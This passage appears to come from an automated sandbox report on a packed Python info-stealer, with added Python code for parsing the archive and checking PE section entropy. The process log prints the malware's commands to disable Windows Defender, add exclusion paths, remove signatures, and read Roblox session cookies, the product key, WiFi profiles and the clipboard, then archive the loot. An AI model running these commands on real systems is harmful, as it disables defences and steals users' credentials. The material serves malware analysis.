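    package, toc, offset = b"", b"", 0
    for name, typ, data, compress in files:
        payload = zlib.compress(data) if compress else data
        name_field = name + b"\0"
        name_field += b"\0" * (-(TOC_ENTRY.size + len(name_field)) % 16)   # entries are padded to 16 bytes
        entry_len = TOC_ENTRY.size + len(name_field)
        toc += TOC_ENTRY.pack(entry_len, offset, len(payload), len(data), int(compress), typ) + name_field
        package += payload
        offset += len(payload)
    toc_offset = len(package)
    len_package = len(package) + len(toc) + COOKIE.size
    cookie = COOKIE.pack(MAGIC, len_package, toc_offset, len(toc), 311, b"python311.dll")
    return bootloader + package + toc + cookie


if __name__ == "__main__":
    version, pylib, entries = parse_archive(build_sample_archive(b"MZ" + b"\0" * 1024))
    print(f"Python {version} ({pylib})")
    for e in entries:
        print(f"{e['type']:<10} {e['size']:>8} {e['name']}")
```

On a real sample call `parse_archive(open(path, "rb").read())` and write out the entries of type `binary` and `script`. The `pyz` entry holds the marshalled .pyc modules and only loads under the same interpreter release the cookie names, so the version string is the first thing to check before decompiling the extracted script.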
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987034574468086
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922604615660919
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991515062597809
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975816061482433
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943188170840788
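A "ZLIB complexity" close to 1.0 for a UPX1 section is the report's way of saying the section body barely compresses, which is what compressed or encrypted (packed) code looks like. The script below is an added example, not code from the report, that reproduces that check together with byte entropy by walking the PE section table directly, so no third-party parser is needed. The minimal PE it builds is constructed here: only the fields the section walk reads are meaningful, the UPX1 payload is seeded pseudo-random data standing in for packed code, and the 0.9 threshold is a common rule of thumb rather than a value the report states.

```python
"""Per-section packing indicators for a PE file (added example)."""
import math
import random
import struct
import zlib
from collections import Counter

PE_SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")   # 40-byte IMAGE_SECTION_HEADER


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size (the report's 'ZLIB complexity')."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def shannon_entropy(data: bytes) -> float:
    """Byte entropy in bits; 8.0 means every byte value is equally likely."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def iter_sections(pe: bytes):
    """Yield (name, raw_bytes) for every section listed in the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]       # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr, *_rest = PE_SECTION_HEADER.unpack_from(pe, table + i * 40)
        yield name.rstrip(b"\0").decode("ascii", "replace"), pe[raw_ptr:raw_ptr + raw_size]


def packed_sections(pe: bytes, threshold: float = 0.9):
    """Return {name: (zlib_complexity, entropy)} for sections whose complexity exceeds threshold."""
    flagged = {}
    for name, data in iter_sections(pe):
        ratio = zlib_complexity(data)
        if ratio > threshold:
            flagged[name] = (round(ratio, 4), round(shannon_entropy(data), 2))
    return flagged


def build_sample_pe() -> bytes:
    """Constructed minimal PE: a zero-filled UPX0 and a packed-looking UPX1 section."""
    random.seed(1584119)                                        # deterministic stand-in for packed code
    upx1 = bytes(random.getrandbits(8) for _ in range(4096))
    upx0 = b"\x00" * 4096                                       # UPX0 is the unpack destination, empty on disk
    e_lfanew, opt_size = 0x80, 240
    table = e_lfanew + 4 + 20 + opt_size
    data_start = table + 2 * PE_SECTION_HEADER.size
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew) + b"\0" * (e_lfanew - 0x40)
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, opt_size, 0x22)   # x64, two sections
    nt = b"PE\0\0" + coff + b"\0" * opt_size                    # optional header left zeroed
    sec0 = PE_SECTION_HEADER.pack(b"UPX0", 0x10000, 0x1000, len(upx0), data_start, 0, 0, 0, 0, 0x60000080)
    sec1 = PE_SECTION_HEADER.pack(b"UPX1", 0x1000, 0x11000, len(upx1), data_start + len(upx0), 0, 0, 0, 0, 0x60000040)
    return dos + nt + sec0 + sec1 + upx0 + upx1


if __name__ == "__main__":
    sample = build_sample_pe()
    for name, data in iter_sections(sample):
        print(f"{name:<8} zlib={zlib_complexity(data):.4f} entropy={shannon_entropy(data):.2f}")
    print("flagged:", packed_sections(sample))
```

Run it against the dropped DLLs from the report (`iter_sections(open(path, "rb").read())`) to reproduce the 0.99 figures; UPX0 scoring near zero while UPX1 scores near one is the standard UPX signature, and a sample whose every section scores above 0.9 is usually a custom packer or an encrypted payload rather than UPX.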
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@143/56@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19CAFC GetLastError,FormatMessageW
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A3144 GetDiskFreeSpaceExW
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeMutant created: \Sessions\1\BaseNamedObjects\l
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762
              Source: 9g9LZNE4bH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: 9g9LZNE4bH.exeVirustotal: Detection: 45%
              Source: 9g9LZNE4bH.exeReversingLabs: Detection: 42%
              Source: 9g9LZNE4bH.exeString found in binary or memory: set-addPolicy
              Source: 9g9LZNE4bH.exeString found in binary or memory: id-cmc-addExtensions
              Source: 9g9LZNE4bH.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: 9g9LZNE4bH.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: 9g9LZNE4bH.exeString found in binary or memory: --help
              Source: 9g9LZNE4bH.exeString found in binary or memory: --help
              Source: 9g9LZNE4bH.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile read: C:\Users\user\Desktop\9g9LZNE4bH.exeJump to behavior
              Source: unknown Process created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
